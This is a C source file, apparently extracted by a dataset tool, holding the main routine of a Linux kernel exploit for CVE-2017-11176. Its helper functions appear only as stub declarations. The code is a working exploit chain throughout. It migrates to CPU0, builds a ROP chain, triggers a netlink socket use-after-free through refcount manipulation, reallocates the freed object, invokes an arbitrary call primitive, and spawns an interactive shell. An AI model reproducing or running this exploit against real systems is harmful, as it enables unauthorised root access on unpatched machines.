
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_8__ TYPE_2__ ;
typedef struct TYPE_7__ TYPE_1__ ;


typedef int val ;
typedef int uint64_t ;
struct realloc_thread_arg {int dummy; } ;
typedef int rta ;
struct TYPE_8__ {int pid; int sock_fd; } ;
struct TYPE_7__ {int pid; int sock_fd; } ;


 int MAGIC_NL_GROUPS ;
 int MAGIC_NL_PID ;
 int NB_REALLOC_THREADS ;
 int NETLINK_NO_ENOBUFS ;
 int PRESS_KEY () ;
 int SOL_NETLINK ;
 int _dup (int) ;
 scalar_t__ _setsockopt (int,int ,int ,int*,int) ;
 scalar_t__ allocate_uland_structs () ;
 int build_rop_chain (int *) ;
 int check_realloc_succeed (int,int ,int ) ;
 int close (int ) ;
 scalar_t__ decrease_sock_refcounter (int,int) ;
 int execve (char*,char**,int *) ;
 scalar_t__ fill_receive_buffer (TYPE_1__*,TYPE_2__*) ;
 scalar_t__ find_netlink_candidates (TYPE_1__*,TYPE_2__*) ;
 scalar_t__ g_fake_stack ;
 TYPE_2__ g_guard ;
 TYPE_1__ g_target ;
 scalar_t__ init_reallocation (struct realloc_thread_arg*,int) ;
 int memset (struct realloc_thread_arg*,int ,int) ;
 scalar_t__ migrate_to_cpu0 () ;
 int perror (char*) ;
 int printf (char*,...) ;
 int realloc_NOW () ;
 int unblock_fd ;

int main(void)
{
  int sock_fd2 = -1;
  int val;
  struct realloc_thread_arg rta[NB_REALLOC_THREADS];

  printf("[ ] -={ CVE-2017-11176 Exploit }=-\n");

  if (migrate_to_cpu0())
  {
    printf("[-] failed to migrate to CPU#0\n");
    goto fail;
  }
  printf("[+] successfully migrated to CPU#0\n");

  if (allocate_uland_structs())
  {
    printf("[-] failed to allocate userland structures!\n");
    goto fail;
  }

  build_rop_chain((uint64_t*)g_fake_stack);
  printf("[+] ROP-chain ready\n");

  memset(rta, 0, sizeof(rta));
  if (init_reallocation(rta, NB_REALLOC_THREADS))
  {
    printf("[-] failed to initialize reallocation!\n");
    goto fail;
  }
  printf("[+] reallocation ready!\n");

  if (find_netlink_candidates(&g_target, &g_guard))
  {
    printf("[-] failed to find netlink candidates\n");
    goto fail;
  }
  printf("[+] netlink candidates ready:\n");
  printf("[+] target.pid = %d\n", g_target.pid);
  printf("[+] guard.pid  = %d\n", g_guard.pid);

  if (fill_receive_buffer(&g_target, &g_guard))
    goto fail;

  if (((unblock_fd = _dup(g_target.sock_fd)) < 0) ||
      ((sock_fd2 = _dup(g_target.sock_fd)) < 0))
  {
    perror("[-] dup");
    goto fail;
  }
  printf("[+] netlink fd duplicated (unblock_fd=%d, sock_fd2=%d)\n", unblock_fd, sock_fd2);


  if (decrease_sock_refcounter(g_target.sock_fd, unblock_fd) ||
      decrease_sock_refcounter(sock_fd2, unblock_fd))
  {
    goto fail;
  }
  realloc_NOW();


  close(g_guard.sock_fd);
  printf("[+] guard socket closed\n");

  if (!check_realloc_succeed(unblock_fd, MAGIC_NL_PID, MAGIC_NL_GROUPS))
  {
    printf("[-] reallocation failed!\n");

    goto fail;
  }
  printf("[+] reallocation succeed! Have fun :-)\n");



  printf("[ ] invoking arbitrary call primitive...\n");
  val = 3535;
  if (_setsockopt(unblock_fd, SOL_NETLINK, NETLINK_NO_ENOBUFS, &val, sizeof(val)))
  {
    perror("[-] setsockopt");
    goto fail;
  }
  printf("[+] arbitrary call succeed!\n");

  printf("[+] exploit complete!\n");

  printf("[ ] popping shell now!\n");
  char* shell = "/bin/bash";
  char* args[] = {shell, "-i", ((void*)0)};
  execve(shell, args, ((void*)0));

  return 0;

fail:
  printf("[-] exploit failed!\n");
  PRESS_KEY();
  return -1;
}
